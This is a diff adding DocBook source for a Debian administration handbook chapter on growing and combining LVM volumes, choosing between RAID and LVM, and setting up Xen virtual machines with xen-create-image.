+	  <filename>lv_base</filename> there if we want to give an
+	  advantage to the database server compared to the file server. The
+	  command line becomes: <command>lvcreate -n lv_base -L 1G
+	  vg_critical /dev/sdb2</command>. Note that this command can fail
+	  if the PV doesn't have enough free extents. In our example, we
+	  would probably have to create <filename>lv_base</filename> before
+	  <filename>lv_files</filename> to avoid this situation – or free
+	  up some space on <filename>sdb2</filename> with the
+	  <command>pvmove</command> command.</para>
+        </sidebar>
+
+	<para>Logical volumes, once created, end up as block device files
+	in <filename>/dev/mapper/</filename>:</para>
+
+        <screen><computeroutput># </computeroutput><userinput>ls -l /dev/mapper</userinput>
+<computeroutput>total 0
+crw------- 1 root root 10, 236 Jun 10 16:52 control
+lrwxrwxrwx 1 root root       7 Jun 10 17:05 vg_critical-lv_base -&gt; ../dm-1
+lrwxrwxrwx 1 root root       7 Jun 10 17:05 vg_critical-lv_files -&gt; ../dm-0
+lrwxrwxrwx 1 root root       7 Jun 10 17:05 vg_normal-lv_backups -&gt; ../dm-2
+# </computeroutput><userinput>ls -l /dev/dm-*</userinput>
+<computeroutput>brw-rw---T 1 root disk 253, 0 Jun 10 17:05 /dev/dm-0
+brw-rw---- 1 root disk 253, 1 Jun 10 17:05 /dev/dm-1
+brw-rw---- 1 root disk 253, 2 Jun 10 17:05 /dev/dm-2
+</computeroutput>
+</screen>
+
+        <sidebar>
+          <title><emphasis>NOTE</emphasis> Autodetecting LVM volumes</title>
+
+          <para>When the computer boots, the <filename>lvm2-activation</filename>
+          systemd service unit executes <command>vgchange -aay</command>
+          to “activate” the volume groups: it scans the available
+	  devices; those that have been initialized as physical volumes for
+	  LVM are registered into the LVM subsystem, those that belong to
+	  volume groups are assembled, and the relevant logical volumes are
+	  started and made available. There is therefore no need to edit
+	  configuration files when creating or modifying LVM
+	  volumes.</para>
+
+	  <para>Note, however, that the layout of the LVM elements
+	  (physical and logical volumes, and volume groups) is backed up in
+	  <filename>/etc/lvm/backup</filename>, which can be useful in case
+	  of a problem (or just to sneak a peek under the hood).</para>
+        </sidebar>
+
+	<para>To make things easier, convenience symbolic links are also
+	created in directories matching the VGs:</para>
+
+        <screen><computeroutput># </computeroutput><userinput>ls -l /dev/vg_critical</userinput>
+<computeroutput>total 0
+lrwxrwxrwx 1 root root 7 Jun 10 17:05 lv_base -&gt; ../dm-1
+lrwxrwxrwx 1 root root 7 Jun 10 17:05 lv_files -&gt; ../dm-0
+# </computeroutput><userinput>ls -l /dev/vg_normal</userinput>
+<computeroutput>total 0
+lrwxrwxrwx 1 root root 7 Jun 10 17:05 lv_backups -&gt; ../dm-2</computeroutput>
+</screen>
+
+	<para>The LVs can then be used exactly like standard
+	partitions:</para>
+
+        <screen><computeroutput># </computeroutput><userinput>mkfs.ext4 /dev/vg_normal/lv_backups</userinput>
+<computeroutput>mke2fs 1.42.12 (29-Aug-2014)
+Creating filesystem with 3145728 4k blocks and 786432 inodes
+Filesystem UUID: b5236976-e0e2-462e-81f5-0ae835ddab1d
+[...]
+Creating journal (32768 blocks): done
+Writing superblocks and filesystem accounting information: done 
+# </computeroutput><userinput>mkdir /srv/backups</userinput>
+<computeroutput># </computeroutput><userinput>mount /dev/vg_normal/lv_backups /srv/backups</userinput>
+<computeroutput># </computeroutput><userinput>df -h /srv/backups</userinput>
+<computeroutput>Filesystem                        Size  Used Avail Use% Mounted on
+/dev/mapper/vg_normal-lv_backups   12G   30M   12G   1% /srv/backups
+# </computeroutput><userinput>[...]</userinput>
+<computeroutput>[...]
+# </computeroutput><userinput>cat /etc/fstab</userinput>
+<computeroutput>[...]
+/dev/vg_critical/lv_base    /srv/base       ext4 defaults 0 2
+/dev/vg_critical/lv_files   /srv/files      ext4 defaults 0 2
+/dev/vg_normal/lv_backups   /srv/backups    ext4 defaults 0 2</computeroutput>
+</screen>
+
+	<para>From the applications' point of view, the myriad small
+	partitions have now been abstracted into one large 12 GB volume,
+	with a friendlier name.</para>
+      </section>
+      <section id="sect.lvm-over-time">
+        <title>LVM Over Time</title>
+
+	<para>Even though the ability to aggregate partitions or physical
+	disks is convenient, this is not the main advantage brought by LVM.
+	The flexibility it brings is especially noticed as time passes,
+	when needs evolve. In our example, let's assume that new large
+	files must be stored, and that the LV dedicated to the file server
+	is too small to contain them. Since we haven't used the whole space
+	available in <filename>vg_critical</filename>, we can grow
+	<filename>lv_files</filename>. For that purpose, we'll use the
+	<command>lvresize</command> command, then
+	<command>resize2fs</command> to adapt the filesystem
+	accordingly:</para>
+
+        <screen><computeroutput># </computeroutput><userinput>df -h /srv/files/</userinput>
+<computeroutput>Filesystem                        Size  Used Avail Use% Mounted on
+/dev/mapper/vg_critical-lv_files  5.0G  4.6G  146M  97% /srv/files
+# </computeroutput><userinput>lvdisplay -C vg_critical/lv_files</userinput>
+<computeroutput>  LV       VG          Attr     LSize Pool Origin Data%  Meta%  Move Log Cpy%Sync  Convert
+  lv_files vg_critical -wi-ao-- 5.00g
+# </computeroutput><userinput>vgdisplay -C vg_critical</userinput>
+<computeroutput>  VG          #PV #LV #SN Attr   VSize VFree
+  vg_critical   2   2   0 wz--n- 8.09g 2.09g
+# </computeroutput><userinput>lvresize -L 7G vg_critical/lv_files</userinput>
+<computeroutput>  Size of logical volume vg_critical/lv_files changed from 5.00 GiB (1280 extents) to 7.00 GiB (1792 extents).
+  Logical volume lv_files successfully resized
+# </computeroutput><userinput>lvdisplay -C vg_critical/lv_files</userinput>
+<computeroutput>  LV       VG          Attr     LSize Pool Origin Data%  Meta%  Move Log Cpy%Sync  Convert
+  lv_files vg_critical -wi-ao-- 7.00g
+# </computeroutput><userinput>resize2fs /dev/vg_critical/lv_files</userinput>
+<computeroutput>resize2fs 1.42.12 (29-Aug-2014)
+Filesystem at /dev/vg_critical/lv_files is mounted on /srv/files; on-line resizing required
+old_desc_blocks = 1, new_desc_blocks = 1
+The filesystem on /dev/vg_critical/lv_files is now 1835008 (4k) blocks long.
+
+# </computeroutput><userinput>df -h /srv/files/</userinput>
+<computeroutput>Filesystem                        Size  Used Avail Use% Mounted on
+/dev/mapper/vg_critical-lv_files  6.9G  4.6G  2.1G  70% /srv/files</computeroutput>
+</screen>
+
+        <sidebar>
+          <title><emphasis>CAUTION</emphasis> Resizing filesystems</title>
+
+	  <para>Not all filesystems can be resized online; resizing a
+	  volume can therefore require unmounting the filesystem first and
+	  remounting it afterwards. Of course, if one wants to shrink the
+	  space allocated to an LV, the filesystem must be shrunk first;
+	  the order is reversed when the resizing goes in the other
+	  direction: the logical volume must be grown before the filesystem
+	  on it. It's rather straightforward, since at no time must the
+	  filesystem size be larger than the block device where it resides
+	  (whether that device is a physical partition or a logical
+	  volume).</para>
+
+	  <para>The ext3, ext4 and xfs filesystems can be grown online,
+	  without unmounting; shrinking requires an unmount. The reiserfs
+	  filesystem allows online resizing in both directions. The
+	  venerable ext2 allows neither, and always requires
+	  unmounting.</para>
+        </sidebar>
+
+	<para>We could proceed in a similar fashion to extend the volume
+	hosting the database, only we've reached the VG's available space
+	limit:</para>
+
+        <screen><computeroutput># </computeroutput><userinput>df -h /srv/base/</userinput>
+<computeroutput>Filesystem                       Size  Used Avail Use% Mounted on
+/dev/mapper/vg_critical-lv_base 1008M  854M  104M  90% /srv/base
+# </computeroutput><userinput>vgdisplay -C vg_critical</userinput>
+<computeroutput>  VG          #PV #LV #SN Attr   VSize VFree 
+  vg_critical   2   2   0 wz--n- 8.09g 92.00m</computeroutput>
+</screen>
+
+	<para>No matter, since LVM allows adding physical volumes to
+	existing volume groups. For instance, maybe we've noticed that the
+	<filename>sdb1</filename> partition, which was so far used outside
+	of LVM, only contained archives that could be moved to
+	<filename>lv_backups</filename>. We can now recycle it and
+	integrate it to the volume group, and thereby reclaim some
+	available space. This is the purpose of the
+	<command>vgextend</command> command. Of course, the partition must
+	be prepared as a physical volume beforehand. Once the VG has been
+	extended, we can use similar commands as previously to grow the
+	logical volume then the filesystem:</para>
+
+        <screen><computeroutput># </computeroutput><userinput>pvcreate /dev/sdb1</userinput>
+<computeroutput>  Physical volume "/dev/sdb1" successfully created
+# </computeroutput><userinput>vgextend vg_critical /dev/sdb1</userinput>
+<computeroutput>  Volume group "vg_critical" successfully extended
+# </computeroutput><userinput>vgdisplay -C vg_critical</userinput>
+<computeroutput>  VG          #PV #LV #SN Attr   VSize VFree
+  vg_critical   3   2   0 wz--n- 9.09g 1.09g
+# </computeroutput><userinput>[...]</userinput>
+<computeroutput>[...]
+# </computeroutput><userinput>df -h /srv/base/</userinput>
+<computeroutput>Filesystem                       Size  Used Avail Use% Mounted on
+/dev/mapper/vg_critical-lv_base  2.0G  854M  1.1G  45% /srv/base</computeroutput>
+</screen>
+
+        <sidebar>
+          <title><emphasis>GOING FURTHER</emphasis> Advanced LVM</title>
+
+	  <para>LVM also caters for more advanced uses, where many details
+	  can be specified by hand. For instance, an administrator can
+	  tweak the size of the blocks that make up physical and logical
+	  volumes, as well as their physical layout. It is also possible to
+	  move blocks across PVs, for instance to fine-tune performance or,
+	  in a more mundane way, to free a PV when one needs to extract the
+	  corresponding physical disk from the VG (whether to affect it to
+	  another VG or to remove it from LVM altogether). The manual pages
+	  describing the commands are generally clear and detailed. A good
+	  entry point is the
+	  <citerefentry><refentrytitle>lvm</refentrytitle>
+	  <manvolnum>8</manvolnum></citerefentry> manual page.</para>
+        </sidebar>
+      </section>
+    </section>
+    <section id="sect.raid-or-lvm">
+      <title>RAID or LVM?</title>
+
+      <para>RAID and LVM both bring indisputable advantages as soon as one
+      leaves the simple case of a desktop computer with a single hard disk
+      where the usage pattern doesn't change over time. However, RAID and
+      LVM go in two different directions, with diverging goals, and it is
+      legitimate to wonder which one should be adopted. The most
+      appropriate answer will of course depend on current and foreseeable
+      requirements.</para>
+
+      <para>There are a few simple cases where the question doesn't really
+      arise. If the requirement is to safeguard data against hardware
+      failures, then obviously RAID will be set up on a redundant array of
+      disks, since LVM doesn't really address this problem. If, on the
+      other hand, the need is for a flexible storage scheme where the
+      volumes are made independent of the physical layout of the disks,
+      RAID doesn't help much and LVM will be the natural choice.</para>
+
+      <sidebar>
+        <title><emphasis>NOTE</emphasis> If performance matters…</title>
+
+	<para>If input/output speed is of the essence, especially in
+	terms of access times, using LVM and/or RAID in one of the
+	many combinations may have some impact on performances, and
+	this may influence decisions as to which to pick.  However,
+	these differences in performance are really minor, and will
+	only be measurable in a few use cases.  If performance
+	matters, the best gain to be obtained would be to use
+	non-rotating storage media
+	(<indexterm><primary>SSD</primary></indexterm><emphasis>solid-state
+	drives</emphasis> or SSDs); their cost per megabyte is higher
+	than that of standard hard disk drives, and their capacity is
+	usually smaller, but they provide excellent performance for
+	random accesses.  If the usage pattern includes many
+	input/output operations scattered all around the filesystem,
+	for instance for databases where complex queries are routinely
+	being run, then the advantage of running them on an SSD far
+	outweigh whatever could be gained by picking LVM over RAID or
+	the reverse.  In these situations, the choice should be
+	determined by other considerations than pure speed, since the
+	performance aspect is most easily handled by using
+	SSDs.</para>
+      </sidebar>
+
+      <para>The third notable use case is when one just wants to
+      aggregate two disks into one volume, either for performance
+      reasons or to have a single filesystem that is larger than any
+      of the available disks.  This case can be addressed both by a
+      RAID-0 (or even linear-RAID) and by an LVM volume. When in this
+      situation, and barring extra constraints (for instance, keeping
+      in line with the rest of the computers if they only use RAID),
+      the configuration of choice will often be LVM. The initial set
+      up is barely more complex, and that slight increase in
+      complexity more than makes up for the extra flexibility that LVM
+      brings if the requirements change or if new disks need to be
+      added.</para>
+
+      <para>Then of course, there is the really interesting use case, where
+      the storage system needs to be made both resistant to hardware
+      failure and flexible when it comes to volume allocation. Neither RAID
+      nor LVM can address both requirements on their own; no matter, this
+      is where we use both at the same time — or rather, one on top of
+      the other. The scheme that has all but become a standard since RAID
+      and LVM have reached maturity is to ensure data redundancy first by
+      grouping disks in a small number of large RAID arrays, and to use
+      these RAID arrays as LVM physical volumes; logical partitions will
+      then be carved from these LVs for filesystems. The selling point of
+      this setup is that when a disk fails, only a small number of RAID
+      arrays will need to be reconstructed, thereby limiting the time spent
+      by the administrator for recovery.</para>
+
+      <para>Let's take a concrete example: the public relations department
+      at Falcot Corp needs a workstation for video editing, but the
+      department's budget doesn't allow investing in high-end hardware from
+      the bottom up. A decision is made to favor the hardware that is
+      specific to the graphic nature of the work (monitor and video card),
+      and to stay with generic hardware for storage. However, as is widely
+      known, digital video does have some particular requirements for its
+      storage: the amount of data to store is large, and the throughput
+      rate for reading and writing this data is important for the overall
+      system performance (more than typical access time, for instance).
+      These constraints need to be fulfilled with generic hardware, in this
+      case two 300 GB SATA hard disk drives; the system data must also be
+      made resistant to hardware failure, as well as some of the user data.
+      Edited videoclips must indeed be safe, but video rushes pending
+      editing are less critical, since they're still on the
+      videotapes.</para>
+
+      <para>RAID-1 and LVM are combined to satisfy these constraints. The
+      disks are attached to two different SATA controllers to optimize
+      parallel access and reduce the risk of a simultaneous failure, and
+      they therefore appear as <filename>sda</filename> and
+      <filename>sdc</filename>. They are partitioned identically along the
+      following scheme:</para>
+
+      <screen><computeroutput># </computeroutput><userinput>fdisk -l /dev/sda</userinput>
+<computeroutput>
+Disk /dev/sda: 300 GB, 300090728448 bytes, 586114704 sectors
+Units: sectors of 1 * 512 = 512 bytes
+Sector size (logical/physical): 512 bytes / 512 bytes
+I/O size (minimum/optimal): 512 bytes / 512 bytes
+Disklabel type: dos
+Disk identifier: 0x00039a9f
+
+Device    Boot     Start       End   Sectors Size Id Type
+/dev/sda1 *         2048   1992060   1990012 1.0G fd Linux raid autodetect
+/dev/sda2        1992061   3984120   1992059 1.0G 82 Linux swap / Solaris
+/dev/sda3        4000185 586099395 582099210 298G 5  Extended
+/dev/sda5        4000185 203977305 199977120 102G fd Linux raid autodetect
+/dev/sda6      203977306 403970490 199993184 102G fd Linux raid autodetect
+/dev/sda7      403970491 586099395 182128904  93G 8e Linux LVM</computeroutput>
+</screen>
+      <itemizedlist>
+        <listitem>
+	  <para>The first partitions of both disks (about 1 GB) are
+	  assembled into a RAID-1 volume, <filename>md0</filename>. This
+	  mirror is directly used to store the root filesystem.</para>
+        </listitem>
+        <listitem>
+	  <para>The <filename>sda2</filename> and <filename>sdc2</filename>
+	  partitions are used as swap partitions, providing a total 2 GB
+	  of swap space. With 1 GB of RAM, the workstation has a
+	  comfortable amount of available memory.</para>
+        </listitem>
+        <listitem>
+	  <para>The <filename>sda5</filename> and <filename>sdc5</filename>
+	  partitions, as well as <filename>sda6</filename> and
+	  <filename>sdc6</filename>, are assembled into two new RAID-1
+	  volumes of about 100 GB each, <filename>md1</filename> and
+	  <filename>md2</filename>. Both these mirrors are initialized as
+	  physical volumes for LVM, and assigned to the
+	  <filename>vg_raid</filename> volume group. This VG thus contains
+	  about 200 GB of safe space.</para>
+        </listitem>
+        <listitem>
+	  <para>The remaining partitions, <filename>sda7</filename> and
+	  <filename>sdc7</filename>, are directly used as physical volumes,
+	  and assigned to another VG called <filename>vg_bulk</filename>,
+	  which therefore ends up with roughly 200 GB of space.</para>
+        </listitem>
+      </itemizedlist>
+
+      <para>Once the VGs are created, they can be partitioned in a very
+      flexible way. One must keep in mind that LVs created in
+      <filename>vg_raid</filename> will be preserved even if one of the
+      disks fails, which will not be the case for LVs created in
+      <filename>vg_bulk</filename>; on the other hand, the latter will be
+      allocated in parallel on both disks, which allows higher read or
+      write speeds for large files.</para>
+
+      
+      <para>We will therefore create the <filename>lv_usr</filename>,
+      <filename>lv_var</filename> and <filename>lv_home</filename> LVs on
+      <filename>vg_raid</filename>, to host the matching filesystems;
+      another large LV, <filename>lv_movies</filename>, will be used to
+      host the definitive versions of movies after editing. The other VG
+      will be split into a large <filename>lv_rushes</filename>, for data
+      straight out of the digital video cameras, and a
+      <filename>lv_tmp</filename> for temporary files. The location of the
+      work area is a less straightforward choice to make: while good
+      performance is needed for that volume, is it worth risking losing
+      work if a disk fails during an editing session? Depending on the
+      answer to that question, the relevant LV will be created on one VG or
+      the other.</para>
+
+      <para>We now have both some redundancy for important data and much
+      flexibility in how the available space is split across the
+      applications. Should new software be installed later on (for editing
+      audio clips, for instance), the LV hosting <filename>/usr/</filename>
+      can be grown painlessly.</para>
+
+      <sidebar>
+        <title><emphasis>NOTE</emphasis> Why three RAID-1 volumes?</title>
+
+	<para>We could have set up one RAID-1 volume only, to serve as a
+	physical volume for <filename>vg_raid</filename>. Why create three
+	of them, then?</para>
+
+	<para>The rationale for the first split (<filename>md0</filename>
+	vs. the others) is about data safety: data written to both elements
+	of a RAID-1 mirror are exactly the same, and it is therefore
+	possible to bypass the RAID layer and mount one of the disks
+	directly. In case of a kernel bug, for instance, or if the LVM
+	metadata become corrupted, it is still possible to boot a minimal
+	system to access critical data such as the layout of disks in the
+	RAID and LVM volumes; the metadata can then be reconstructed and
+	the files can be accessed again, so that the system can be brought
+	back to its nominal state.</para>
+
+	<para>The rationale for the second split (<filename>md1</filename>
+	vs. <filename>md2</filename>) is less clear-cut, and more related
+	to acknowledging that the future is uncertain. When the workstation
+	is first assembled, the exact storage requirements are not
+	necessarily known with perfect precision; they can also evolve over
+	time. In our case, we can't know in advance the actual storage
+	space requirements for video rushes and complete video clips. If
+	one particular clip needs a very large amount of rushes, and the VG
+	dedicated to redundant data is less than halfway full, we can
+	re-use some of its unneeded space. We can remove one of the
+	physical volumes, say <filename>md2</filename>, from
+	<filename>vg_raid</filename> and either assign it to
+	<filename>vg_bulk</filename> directly (if the expected duration of
+	the operation is short enough that we can live with the temporary
+	drop in performance), or undo the RAID setup on
+	<filename>md2</filename> and integrate its components
+	<filename>sda6</filename> and <filename>sdc6</filename> into the
+	bulk VG (which grows by 200 GB instead of 100 GB); the
+	<filename>lv_rushes</filename> logical volume can then be grown
+	according to requirements.</para>
+      </sidebar>
+    </section>
+  </section>
+  <section id="sect.virtualization">
+    <title>Virtualization</title>
+    <indexterm><primary>virtualization</primary></indexterm> 
+
+    <para>Virtualization is one of the
+    most major advances in the recent years of computing. The term covers
+    various abstractions and techniques simulating virtual computers with a
+    variable degree of independence on the actual hardware. One physical
+    server can then host several systems working at the same time and in
+    isolation. Applications are many, and often derive from this isolation:
+    test environments with varying configurations for instance, or
+    separation of hosted services across different virtual machines for
+    security.</para>
+
+    <para>There are multiple virtualization solutions, each with its own
+    pros and cons. This book will focus on Xen, LXC, and KVM, but other
+    noteworthy implementations include the following:</para>
+    <indexterm><primary><emphasis>VMWare</emphasis></primary></indexterm>
+    <indexterm><primary><emphasis>Bochs</emphasis></primary></indexterm>
+    <indexterm><primary><emphasis>QEMU</emphasis></primary></indexterm>
+    <indexterm><primary><emphasis>VirtualBox</emphasis></primary></indexterm>
+    <indexterm><primary><emphasis>KVM</emphasis></primary></indexterm>
+    <indexterm><primary><emphasis>LXC</emphasis></primary></indexterm>
+    <itemizedlist>
+      <listitem>
+	<para>QEMU is a software emulator for a full computer; performances
+	are far from the speed one could achieve running natively, but this
+	allows running unmodified or experimental operating systems on the
+	emulated hardware. It also allows emulating a different hardware
+	architecture: for instance, an <emphasis>amd64</emphasis> system can
+	emulate an <emphasis>arm</emphasis> computer. QEMU is free
+	software. <ulink type="block" url="http://www.qemu.org/" /></para>
+      </listitem>
+      <listitem>
+	<para>Bochs is another free virtual machine, but it only
+	emulates the x86 architectures (i386 and amd64).</para>
+      </listitem>
+      <listitem>
+	<para>VMWare is a proprietary virtual machine; being one of the
+	oldest out there, it is also one of the most widely-known. It works
+	on principles similar to QEMU. VMWare proposes advanced features
+	such as snapshotting a running virtual machine. <ulink type="block" url="http://www.vmware.com/" /></para>
+      </listitem>
+      <listitem>
+        <para>VirtualBox is a virtual machine that is mostly free software
+          (some extra components are available under a proprietary
+          license). Unfortunately it is in Debian's “contrib” section because it
+          includes some precompiled files that cannot be rebuilt without a
+          proprietary compiler and it currently only resides in Debian Unstable
+          as Oracle's policies make it impossible to keep it secure
+          in a Debian stable release (see <ulink url="https://bugs.debian.org/794466">#794466</ulink>). While
+          younger than VMWare and restricted to the i386 and amd64
+          architectures, it still includes some snapshotting and other
+          interesting features.
+          <ulink type="block" url="http://www.virtualbox.org/" />
+        </para>
+      </listitem>
+    </itemizedlist>
+    <section id="sect.xen">
+      <title>Xen</title>
+
+      <para>Xen <indexterm><primary>Xen</primary></indexterm> is a
+      “paravirtualization” solution. It introduces a thin abstraction
+      layer, called a “hypervisor”, between the hardware and the upper
+      systems; this acts as a referee that controls access to hardware from
+      the virtual machines. However, it only handles a few of the
+      instructions, the rest is directly executed by the hardware on behalf
+      of the systems. The main advantage is that performances are not
+      degraded, and systems run close to native speed; the drawback is that
+      the kernels of the operating systems one wishes to use on a Xen
+      hypervisor need to be adapted to run on Xen.</para>
+
+      <para>Let's spend some time on terms. The hypervisor is the lowest
+      layer, that runs directly on the hardware, even below the kernel.
+      This hypervisor can split the rest of the software across several
+      <emphasis>domains</emphasis>, which can be seen as so many virtual
+      machines. One of these domains (the first one that gets started) is
+      known as <emphasis>dom0</emphasis>, and has a special role, since
+      only this domain can control the hypervisor and the execution of
+      other domains. These other domains are known as
+      <emphasis>domU</emphasis>. In other words, and from a user point of
+      view, the <emphasis>dom0</emphasis> matches the “host” of other
+      virtualization systems, while a <emphasis>domU</emphasis> can be seen
+      as a “guest”.</para>
+
+      <sidebar>
+        <title><emphasis>CULTURE</emphasis> Xen and the various versions of Linux</title>
+
+	<para>Xen was initially developed as a set of patches that lived
+	out of the official tree, and not integrated to the Linux kernel.
+	At the same time, several upcoming virtualization systems
+	(including KVM) required some generic virtualization-related
+	functions to facilitate their integration, and the Linux kernel
+	gained this set of functions (known as the
+	<emphasis>paravirt_ops</emphasis> or <emphasis>pv_ops</emphasis>
+	interface). Since the Xen patches were duplicating some of the
+	functionality of this interface, they couldn't be accepted
+	officially.</para>
+
+	<para>Xensource, the company behind Xen, therefore had to port Xen
+	to this new framework, so that the Xen patches could be merged into
+	the official Linux kernel. That meant a lot of code rewrite, and
+	although Xensource soon had a working version based on the
+	paravirt_ops interface, the patches were only progressively merged
+	into the official kernel. The merge was completed in Linux 3.0.
+	<ulink type="block" url="http://wiki.xenproject.org/wiki/XenParavirtOps" /></para>
+
+	<para>Since <emphasis role="distribution">Jessie</emphasis> is
+	based on version 3.16 of the Linux kernel, the standard
+	<emphasis role="pkg">linux-image-686-pae</emphasis> and
+	<emphasis role="pkg">linux-image-amd64</emphasis> packages
+	include the necessary code, and the distribution-specific
+	patching that was required for <emphasis role="distribution">Squeeze</emphasis> and earlier versions of
+	Debian is no more. <ulink type="block" url="http://wiki.xenproject.org/wiki/Xen_Kernel_Feature_Matrix" /></para>
+      </sidebar>
+
+      <sidebar>
+        <title><emphasis>NOTE</emphasis> Architectures compatible with Xen</title>
+
+        <para>Xen is currently only available for the i386, amd64, arm64
+        and armhf architectures.</para>
+      </sidebar>
+
+      <sidebar>
+        <title><emphasis>CULTURE</emphasis> Xen and non-Linux kernels</title>
+
+	<para>Xen requires modifications to all the operating systems
+	one wants to run on it; not all kernels have the same level of
+	maturity in this regard. Many are fully-functional, both as
+	dom0 and domU: Linux 3.0 and later, NetBSD 4.0 and later, and
+        OpenSolaris. Others only work as a domU. You can check the status
+        of each operating system in the Xen wiki:
+        <ulink type="block" url="http://wiki.xenproject.org/wiki/Dom0_Kernels_for_Xen" />
+        <ulink type="block" url="http://wiki.xenproject.org/wiki/DomU_Support_for_Xen" />
+	</para>
+
+	<para>However, if Xen can rely on the hardware functions dedicated
+	to virtualization (which are only present in more recent
+	processors), even non-modified operating systems can run as domU
+	(including Windows).</para>
+      </sidebar>
+
+      <para>Using Xen under Debian requires three components:</para>
+      <itemizedlist>
+        <listitem>
+	  <para>The hypervisor itself. According to the available hardware,
+          the appropriate package will be either
+          <emphasis role="pkg">xen-hypervisor-4.4-amd64</emphasis>,
+          <emphasis role="pkg">xen-hypervisor-4.4-armhf</emphasis>,
+          or <emphasis role="pkg">xen-hypervisor-4.4-arm64</emphasis>.</para>
+        </listitem>
+        <listitem>
+	  <para>A kernel that runs on that hypervisor. Any kernel more
+	  recent than 3.0 will do, including the 3.16 version present
+	  in <emphasis role="distribution">Jessie</emphasis>.</para>
+        </listitem>
+        <listitem>
+	  <para>The i386 architecture also requires a standard library with
+	  the appropriate patches taking advantage of Xen; this is in the
+	  <emphasis role="pkg">libc6-xen</emphasis> package.</para>
+        </listitem>
+      </itemizedlist>
+
+      <para>In order to avoid the hassle of selecting these components
+      by hand, a few convenience packages (such as <emphasis role="pkg">xen-linux-system-amd64</emphasis>) have been made
+      available; they all pull in a known-good combination of the
+      appropriate hypervisor and kernel packages. The hypervisor also
+      brings <emphasis role="pkg">xen-utils-4.4</emphasis>, which
+      contains tools to control the hypervisor from the dom0. This in
+      turn brings the appropriate standard library. During the
+      installation of all that, configuration scripts also create a
+      new entry in the Grub bootloader menu, so as to start the chosen
+      kernel in a Xen dom0. Note however that this entry is not
+      usually set to be the first one in the list, and will therefore
+      not be selected by default. If that is not the desired behavior,
+      the following commands will change it:</para>
+
+      <screen><computeroutput># </computeroutput><userinput>mv /etc/grub.d/20_linux_xen /etc/grub.d/09_linux_xen
+</userinput><computeroutput># </computeroutput><userinput>update-grub
+</userinput>
+</screen>
+
+      <para>Once these prerequisites are installed, the next step is to
+      test the behavior of the dom0 by itself; this involves a reboot to
+      the hypervisor and the Xen kernel. The system should boot in its
+      standard fashion, with a few extra messages on the console during the
+      early initialization steps.</para>
+
+      <para>Now is the time to actually install useful systems on the domU
+      systems, using the tools from <emphasis role="pkg">xen-tools</emphasis>. This package provides the
+      <command>xen-create-image</command> command, which largely automates
+      the task. The only mandatory parameter is
+      <literal>--hostname</literal>, giving a name to the domU; other
+      options are important, but they can be stored in the
+      <filename>/etc/xen-tools/xen-tools.conf</filename> configuration
+      file, and their absence from the command line doesn't trigger an
+      error. It is therefore important to either check the contents of this
+      file before creating images, or to use extra parameters in the
+      <command>xen-create-image</command> invocation. Important parameters
+      of note include the following:</para>
+      <itemizedlist>
+        <listitem>
+	  <para><literal>--memory</literal>, to specify the amount of RAM
+	  dedicated to the newly created system;</para>
+        </listitem>
+        <listitem>
+	  <para><literal>--size</literal> and <literal>--swap</literal>, to
+	  define the size of the “virtual disks” available to the
+	  domU;</para>
+        </listitem>
+        <listitem>
+	  <para><literal>--debootstrap</literal>, to cause the new system
+	  to be installed with <command>debootstrap</command>; in that
+	  case, the <literal>--dist</literal> option will also most often
+	  be used (with a distribution name such as <emphasis role="distribution">jessie</emphasis>).</para>
+
+          <sidebar>
+            <title><emphasis>GOING FURTHER</emphasis> Installing a non-Debian system in a domU</title>
+
+	    <para>In case of a non-Linux system, care should be taken to
+	    define the kernel the domU must use, using the
+	    <literal>--kernel</literal> option.</para>
+          </sidebar>
+        </listitem>
+        <listitem>
+	  <para><literal>--dhcp</literal> states that the domU's network
+	  configuration should be obtained by DHCP while
+	  <literal>--ip</literal> allows defining a static IP
+	  address.</para>
+        </listitem>
+        <listitem>
+	  <para>Lastly, a storage method must be chosen for the images to
+	  be created (those that will be seen as hard disk drives from the
+	  domU). The simplest method, corresponding to the
+	  <literal>--dir</literal> option, is to create one file on the
+	  dom0 for each device the domU should be provided. For systems
+	  using LVM, the alternative is to use the <literal>--lvm</literal>
+	  option, followed by the name of a volume group;
+	  <command>xen-create-image</command> will then create a new
+	  logical volume inside that group, and this logical volume will be
+	  made available to the domU as a hard disk drive.</para>
+
+          <sidebar>
+            <title><emphasis>NOTE</emphasis> Storage in the domU</title>
+
+	    <para>Entire hard disks can also be exported to the domU, as
+	    well as partitions, RAID arrays or pre-existing LVM logical
+	    volumes. These operations are not automated by
+	    <command>xen-create-image</command>, however, so editing the
+	    Xen image's configuration file is in order after its initial
+	    creation with <command>xen-create-image</command>.</para>
+          </sidebar>
+        </listitem>
+      </itemizedlist>
+
+      <para>Once these choices are made, we can create the image for our
+      future Xen domU:</para>
+
+      <screen><computeroutput># </computeroutput><userinput>xen-create-image --hostname testxen --dhcp --dir /srv/testxen --size=2G --dist=jessie --role=udev</userinput>
+<computeroutput>
+[...]
+General Information
+--------------------
+Hostname       :  testxen
+Distribution   :  jessie
+Mirror         :  http://ftp.debian.org/debian/
+Partitions     :  swap            128Mb (swap)
+                  /               2G    (ext3)
+Image type     :  sparse
+Memory size    :  128Mb
+Kernel path    :  /boot/vmlinuz-3.16.0-4-amd64
+Initrd path    :  /boot/initrd.img-3.16.0-4-amd64
+[...]
+Logfile produced at:
+         /var/log/xen-tools/testxen.log
+
+Installation Summary
+---------------------
+Hostname        :  testxen
+Distribution    :  jessie
+MAC Address     :  00:16:3E:8E:67:5C
+IP-Address(es)  :  dynamic
+RSA Fingerprint :  0a:6e:71:98:95:46:64:ec:80:37:63:18:73:04:dd:2b
+Root Password   :  adaX2jyRHNuWm8BDJS7PcEJ
+</computeroutput>
+</screen>
+
+      <para>We now have a virtual machine, but it is currently not running
+      (and therefore only using space on the dom0's hard disk). Of course,
+      we can create more images, possibly with different parameters.</para>
+
+      <para>Before turning these virtual machines on, we need to define how
+      they'll be accessed. They can of course be considered as isolated
+      machines, only accessed through their system console, but this rarely
+      matches the usage pattern. Most of the time, a domU will be
+      considered as a remote server, and accessed only through a network.
+      However, it would be quite inconvenient to add a network card for
+      each domU; which is why Xen allows creating virtual interfaces, that
+      each domain can see and use in a standard way. Note that these cards,
+      even though they're virtual, will only be useful once connected to a
+      network, even a virtual one. Xen has several network models for
+      that:</para>
+      <itemizedlist>
+        <listitem>
+	  <para>The simplest model is the <emphasis>bridge</emphasis>
+	  model; all the eth0 network cards (both in the dom0 and the domU
+	  systems) behave as if they were directly plugged into an Ethernet
+	  switch.</para>
+        </listitem>
+        <listitem>
+	  <para>Then comes the <emphasis>routing</emphasis> model, where the
+	  dom0 behaves as a router that stands between the domU systems and
+	  the (physical) external network.</para>
